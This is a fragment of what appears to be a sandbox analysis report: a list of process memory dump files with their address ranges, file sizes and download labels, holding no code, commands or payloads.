                                                                                                                                                                                                                                    • memory/4040-287-0x0000000004B70000-0x0000000004B78000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4040-286-0x0000000004830000-0x0000000004838000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4040-279-0x0000000003600000-0x0000000003610000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4040-272-0x0000000003460000-0x0000000003470000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4040-224-0x0000000000400000-0x0000000000664000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2.4MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4084-160-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      348KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4084-159-0x00000000004C0000-0x000000000056E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-330-0x0000000005E40000-0x0000000005E91000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      324KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-331-0x0000000005E40000-0x0000000005E63000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      140KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-336-0x0000000005E40000-0x0000000005E63000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      140KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-335-0x0000000002925000-0x0000000002927000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-333-0x0000000002922000-0x0000000002923000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-334-0x000000006AB00000-0x000000006AD71000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2.4MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-329-0x0000000002920000-0x0000000002921000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4112-332-0x0000000065EC0000-0x0000000067271000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      19.7MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4624-349-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4696-343-0x0000000002D10000-0x0000000002D25000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      84KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4824-314-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      92KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4896-324-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4912-322-0x00000000026C0000-0x00000000026C2000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4988-328-0x0000000002A34000-0x0000000002A35000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4988-326-0x0000000002A32000-0x0000000002A34000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/4988-325-0x0000000002A30000-0x0000000002A32000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download